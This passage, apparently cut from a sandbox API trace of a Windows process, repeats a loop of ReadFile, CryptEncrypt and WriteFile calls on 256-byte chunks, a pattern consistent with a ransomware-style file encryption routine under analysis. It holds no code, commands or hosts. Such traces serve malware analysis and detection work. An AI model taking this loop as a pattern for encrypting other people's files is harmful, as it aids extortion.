lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.129] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.129] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.129] GetLastError () returned 0x0 [0164.129] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.129] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.129] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.129] GetLastError () returned 0x0 [0164.129] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.129] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.130] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.130] GetLastError () returned 0x0 [0164.130] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.130] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.130] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.130] GetLastError () returned 0x0 [0164.130] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.130] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.130] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.130] GetLastError () returned 0x0 [0164.130] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.130] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.130] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.130] GetLastError () returned 0x0 [0164.130] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.130] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.130] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.130] GetLastError () returned 0x0 [0164.130] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.130] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.130] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.130] GetLastError () returned 0x0 [0164.130] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.130] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.131] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.131] GetLastError () returned 0x0 [0164.131] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.131] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.131] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.131] GetLastError () returned 0x0 [0164.131] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.131] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.131] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.131] GetLastError () returned 0x0 [0164.131] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.131] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.131] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.131] GetLastError () returned 0x0 [0164.131] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.131] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.131] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.131] GetLastError () returned 0x0 [0164.131] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.131] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.131] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.131] GetLastError () returned 0x0 [0164.131] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.131] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.131] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.131] GetLastError () returned 0x0 [0164.131] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.132] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.132] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.132] GetLastError () returned 0x0 [0164.132] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.132] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.132] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.132] GetLastError () returned 0x0 [0164.132] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.132] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.132] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.132] GetLastError () returned 0x0 [0164.132] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.132] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.132] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.132] GetLastError () returned 0x0 [0164.132] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.132] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.132] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.132] GetLastError () returned 0x0 [0164.132] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.132] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.132] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.132] GetLastError () returned 0x0 [0164.133] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.133] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.133] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.133] GetLastError () returned 0x0 [0164.133] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.133] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.133] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.133] GetLastError () returned 0x0 [0164.133] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.133] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.133] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.133] GetLastError () returned 0x0 [0164.133] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.133] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.133] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.133] GetLastError () returned 0x0 [0164.133] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.133] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.133] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.133] GetLastError () returned 0x0 [0164.133] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.133] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.133] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.133] GetLastError () returned 0x0 [0164.133] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.133] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.134] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.134] GetLastError () returned 0x0 [0164.134] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.134] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.134] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.134] GetLastError () returned 0x0 [0164.134] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.134] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.134] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.134] GetLastError () returned 0x0 [0164.134] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.134] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.134] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.134] GetLastError () returned 0x0 [0164.134] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.134] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.134] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.134] GetLastError () returned 0x0 [0164.134] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.134] ReadFile (in: 